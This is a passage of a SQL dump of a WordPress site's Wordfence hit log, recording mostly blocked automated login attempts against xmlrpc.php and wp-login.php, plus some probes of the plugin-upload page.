Network',NULL),(12014,0.000000,1631254829.022560,'\0\0\0\0\0\0\0\0\0\0���6�:',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12015,1631255258.766621,1631255258.674600,'\0\0\0\0\0\0\0\0\0\0���6�:',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12016,1631254830.649936,1631254830.559800,'\0\0\0\0\0\0\0\0\0\0���6�:',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12017,0.000000,1631280021.948438,'\0\0\0\0\0\0\0\0\0\0���6�D',0,200,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53','loginFailInvalidUsername',NULL,NULL),(12018,0.000000,1631281134.783596,'\0\0\0\0\0\0\0\0\0\0����U',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12019,1631281137.852326,1631281137.776700,'\0\0\0\0\0\0\0\0\0\0����U',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12020,0.000000,1631284869.352918,'\0\0\0\0\0\0\0\0\0\0��6�\"p',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12021,0.000000,1631286403.850232,'\0\0\0\0\0\0\0\0\0\0��(B+�',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12022,0.000000,1631288597.137328,'\0\0\0\0\0\0\0\0\0\0���;U�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12023,0.000000,1631291262.591891,'\0\0\0\0\0\0\0\0\0\0��xO�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12024,0.000000,1631291803.982635,'\0\0\0\0\0\0\0\0\0\0���6x]',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12025,0.000000,1631292414.246231,'\0\0\0\0\0\0\0\0\0\0��?�)',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12026,0.000000,1631293562.660725,'\0\0\0\0\0\0\0\0\0\0��[�ȷ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12027,0.000000,1631294140.180081,'\0\0\0\0\0\0\0\0\0\0��E��}',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12028,0.000000,1631294208.270674,'\0\0\0\0\0\0\0\0\0\0��R�20',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12029,0.000000,1631294703.332385,'\0\0\0\0\0\0\0\0\0\0���i��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12030,0.000000,1631295254.734443,'\0\0\0\0\0\0\0\0\0\0���H�l',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12031,0.000000,1631295800.525826,'\0\0\0\0\0\0\0\0\0\0��\rQ(',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12032,0.000000,1631296290.302209,'\0\0\0\0\0\0\0\0\0\0��E��|',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12033,0.000000,1631296774.933294,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12034,0.000000,1631297280.443660,'\0\0\0\0\0\0\0\0\0\0��k�X)',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12035,0.000000,1631297770.190610,'\0\0\0\0\0\0\0\0\0\0���Aێ',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12036,0.000000,1631298323.950978,'\0\0\0\0\0\0\0\0\0\0���\r�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12037,0.000000,1631298803.138699,'\0\0\0\0\0\0\0\0\0\0����w!',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12038,0.000000,1631299321.123939,'\0\0\0\0\0\0\0\0\0\0���i',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12039,0.000000,1631299843.198331,'\0\0\0\0\0\0\0\0\0\0���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12040,0.000000,1631300886.032538,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12041,0.000000,1631301409.369245,'\0\0\0\0\0\0\0\0\0\0��\r$n�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12042,0.000000,1631301963.249613,'\0\0\0\0\0\0\0\0\0\0��C��T',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12043,0.000000,1631302509.379389,'\0\0\0\0\0\0\0\0\0\0��_o�|',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12044,0.000000,1631303033.505833,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12045,0.000000,1631303591.580930,'\0\0\0\0\0\0\0\0\0\0���#��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12046,0.000000,1631304135.425760,'\0\0\0\0\0\0\0\0\0\0��g���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12047,0.000000,1631304697.598456,'\0\0\0\0\0\0\0\0\0\0��w4�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12048,0.000000,1631305263.773116,'\0\0\0\0\0\0\0\0\0\0��i9o',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12049,0.000000,1631305816.799046,'\0\0\0\0\0\0\0\0\0\0����\'B',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12050,0.000000,1631306385.900137,'\0\0\0\0\0\0\0\0\0\0��\\�6q',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12051,0.000000,1631306929.807604,'\0\0\0\0\0\0\0\0\0\0��3��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12052,0.000000,1631307523.403643,'\0\0\0\0\0\0\0\0\0\0���>M�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12053,0.000000,1631307699.622404,'\0\0\0\0\0\0\0\0\0\0���6�D',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12054,1631307701.689970,1631307701.610100,'\0\0\0\0\0\0\0\0\0\0���6�D',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12055,0.000000,1631308090.414154,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12056,0.000000,1631308522.531927,'\0\0\0\0\0\0\0\0\0\0����U',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12057,1631308523.907447,1631308523.821100,'\0\0\0\0\0\0\0\0\0\0����U',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12058,0.000000,1631308684.566961,'\0\0\0\0\0\0\0\0\0\0��?�)',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12059,0.000000,1631309262.469794,'\0\0\0\0\0\0\0\0\0\0��-wS�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12060,0.000000,1631309857.829933,'\0\0\0\0\0\0\0\0\0\0��pJ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12061,0.000000,1631310450.456663,'\0\0\0\0\0\0\0\0\0\0��\rJ��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12062,0.000000,1631311057.578355,'\0\0\0\0\0\0\0\0\0\0��z��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12063,0.000000,1631311663.391216,'\0\0\0\0\0\0\0\0\0\0����7',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12064,0.000000,1631312250.780110,'\0\0\0\0\0\0\0\0\0\0����y�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12065,0.000000,1631312870.663866,'\0\0\0\0\0\0\0\0\0\0���q�u',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12066,0.000000,1631313467.770249,'\0\0\0\0\0\0\0\0\0\0���a��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12067,0.000000,1631314082.350320,'\0\0\0\0\0\0\0\0\0\0���KG�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12068,0.000000,1631314712.159209,'\0\0\0\0\0\0\0\0\0\0��\r^�,',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12069,0.000000,1631315328.802432,'\0\0\0\0\0\0\0\0\0\0��g�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12070,0.000000,1631315954.399326,'\0\0\0\0\0\0\0\0\0\0��k�X)',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12071,0.000000,1631316587.680522,'\0\0\0\0\0\0\0\0\0\0��g*:f',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12072,0.000000,1631317218.490885,'\0\0\0\0\0\0\0\0\0\0���Hݾ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12073,0.000000,1631317860.281026,'\0\0\0\0\0\0\0\0\0\0��#�1�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12074,0.000000,1631319160.193785,'\0\0\0\0\0\0\0\0\0\0��/J�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12075,0.000000,1631319828.752236,'\0\0\0\0\0\0\0\0\0\0����L�',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12076,0.000000,1631320495.001544,'\0\0\0\0\0\0\0\0\0\0��H8�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12077,0.000000,1631320676.203844,'\0\0\0\0\0\0\0\0\0\0��(B+�',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12078,0.000000,1631321158.985415,'\0\0\0\0\0\0\0\0\0\0����L�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12079,0.000000,1631321821.790074,'\0\0\0\0\0\0\0\0\0\0��k�X�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12080,0.000000,1631322485.811789,'\0\0\0\0\0\0\0\0\0\0��]�xr',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12081,0.000000,1631323216.045984,'\0\0\0\0\0\0\0\0\0\0���]�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12082,0.000000,1631323906.116553,'\0\0\0\0\0\0\0\0\0\0��-=��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12083,0.000000,1631324586.980136,'\0\0\0\0\0\0\0\0\0\0���V�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12084,0.000000,1631325316.134452,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12085,0.000000,1631325402.603025,'\0\0\0\0\0\0\0\0\0\0���6�D',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12086,1631325419.923551,1631325419.830000,'\0\0\0\0\0\0\0\0\0\0���6�D',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12087,0.000000,1631326008.287493,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12088,0.000000,1631326586.212937,'\0\0\0\0\0\0\0\0\0\0���6�D',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12089,1631326599.827297,1631326599.734500,'\0\0\0\0\0\0\0\0\0\0���6�D',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12090,0.000000,1631326739.243303,'\0\0\0\0\0\0\0\0\0\0����l[',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12091,0.000000,1631327266.630720,'\0\0\0\0\0\0\0\0\0\0��B��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12092,0.000000,1631327962.129848,'\0\0\0\0\0\0\0\0\0\0��|�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12093,0.000000,1631328728.277730,'\0\0\0\0\0\0\0\0\0\0��g*:f',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12094,0.000000,1631329464.167672,'\0\0\0\0\0\0\0\0\0\0���c]�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12095,0.000000,1631330226.459942,'\0\0\0\0\0\0\0\0\0\0����8$',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12096,0.000000,1631330997.688397,'\0\0\0\0\0\0\0\0\0\0��Vh\'�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12097,0.000000,1631331706.860579,'\0\0\0\0\0\0\0\0\0\0��+�Ԟ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12098,0.000000,1631332345.041955,'\0\0\0\0\0\0\0\0\0\0���#j�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12099,0.000000,1631332956.088139,'\0\0\0\0\0\0\0\0\0\0���yQ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12100,0.000000,1631333475.294229,'\0\0\0\0\0\0\0\0\0\0��E��}',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12101,0.000000,1631333963.391259,'\0\0\0\0\0\0\0\0\0\0���]�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12102,0.000000,1631334437.555125,'\0\0\0\0\0\0\0\0\0\0��?�)',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12103,0.000000,1631334918.652799,'\0\0\0\0\0\0\0\0\0\0��[�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12104,0.000000,1631335442.488169,'\0\0\0\0\0\0\0\0\0\0��_o�|',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux 